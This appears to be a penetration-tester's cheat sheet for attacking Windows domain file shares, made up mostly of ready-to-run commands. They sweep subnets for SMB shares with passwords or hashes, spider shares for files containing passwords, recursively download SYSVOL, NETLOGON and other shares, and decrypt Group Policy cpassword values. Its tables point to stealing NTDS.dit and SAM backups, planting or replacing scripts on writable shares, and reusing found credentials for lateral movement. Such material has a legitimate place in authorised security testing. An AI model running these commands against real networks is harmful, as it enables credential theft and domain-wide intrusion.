#Prerequisites
- Valid domain credentials or low privilege sufficient
- Network access to target hosts
#What to Look For
| Finding | Value |
|---|
| Credentials in scripts/config files | Immediate escalation |
| Deployment shares with install scripts | Often contain service account passwords |
| IT shares with GPO backups | May contain credentials or password policies |
| Writable shares | File drop / poisoning potential |
| SYSVOL and NETLOGON | GPP passwords, logon scripts — always check |
| Backup shares | May contain NTDS.dit or SAM backups |
#Enumerate Shares via NetExec
bash
nxc smb <target-ip> -u <username> -p <password> --shares
# Always check DC — SYSVOL, NETLOGON
nxc smb <dc-ip> -u <username> -p <password> --shares
# Sweep subnet
nxc smb <subnet>/24 -u <username> -p <password> --shares
# Hash instead of password
nxc smb <subnet>/24 -u <username> -H <hash> --shares
# Machine account
nxc smb <dc-ip> -u '<machine$>' -p '<password>' --shares
#Spider Shares for Interesting Files
bash
# Results saved to /tmp/nxc_spider_plus/<target>/
nxc smb <target-ip> -u <username> -p <password> -M spider_plus
nxc smb <target-ip> -u <username> -p <password> -M spider_plus \
-o EXCLUDE_EXTS=".dll,.exe,.msi,.msp,.msu"
nxc smb <target-ip> -u <username> -p <password> -M spider_plus \
-o SHARE=<share-name>
nxc smb <subnet>/24 -u <username> -p <password> -M spider_plus
#Manspider - Content Search
bash
manspider <target-ip> -f passw login logon cred secret \
-d <domain.local> -u <username> -p <password>
# Search file contents
manspider <target-ip> -f passw \
-d <domain.local> -u <username> -p <password> --content
# Specific file types
manspider <target-ip> \
-d <domain.local> -u <username> -p <password> \
-e xml ini txt config ps1 bat cmd
# Suppress no-match noise
manspider <target-ip> -f passw login logon \
-d <domain.local> -u <username> -p <password> -n
#Manual Share Access
bash
smbclient \\\\<target-ip>\\<share-name> -U '<domain>/<username>%<password>'
smbclient \\\\<target-ip>\\<share-name> -U '<domain>/<username>%<password>' -c 'ls'
# Download recursively
smbclient \\\\<target-ip>\\<share-name> -U '<domain>/<username>%<password>' \
-c 'recurse ON; prompt OFF; mget *'
# SYSVOL / NETLOGON
smbclient \\\\<dc-ip>\\SYSVOL -U '<domain>/<username>%<password>'
smbclient \\\\<dc-ip>\\NETLOGON -U '<domain>/<username>%<password>'
#SYSVOL - GPP Password Hunting
bash
# On a Domain connected Windows box
findstr /S /I cpassword \\<dc-ip>\sysvol\<domain>\policies\*.xml
nxc smb <dc-ip> -u <username> -p <password> -M gpp_password
gpp-decrypt <cpassword-value>
#Mount Share on Linux
bash
sudo mkdir /mnt/share
sudo mount -t cifs //<target-ip>/<share-name> /mnt/share \
-o username=<username>,password=<password>,domain=<domain.local>
ls -la /mnt/share
grep -ri "password" /mnt/share/ 2>/dev/null
sudo umount /mnt/share
#What Each Result Tells You
| Finding | Implication |
|---|
| SYSVOL readable | Check for GPP passwords, logon scripts |
| Deployment/IT share accessible | Likely credentials in scripts/configs |
| Writable share found | Drop files, replace scripts |
| cpassword in GPP XML | Decrypt immediately — full plaintext recovery |
| Config files with credentials | Pass the password across subnet via nxc |
| Backup share accessible | Check for NTDS.dit, SAM, VSS backups |
| Scripts with hardcoded passwords | Test for lateral movement |
#Flag Reference
nxc spider_plus
| Flag | Meaning |
|---|
-M spider_plus | Recursively map share contents |
-o SHARE=<name> | Limit to specific share |
-o EXCLUDE_EXTS= | Extensions to skip |
manspider
| Flag | Meaning |
|---|
-f <patterns> | Filename patterns to search |
-e <extensions> | File extensions to search within |
-d <domain> | Domain name |
-u <user> | Username |
-p <password> | Password |
-n | Suppress no-match files |
--content | Search file contents |
| |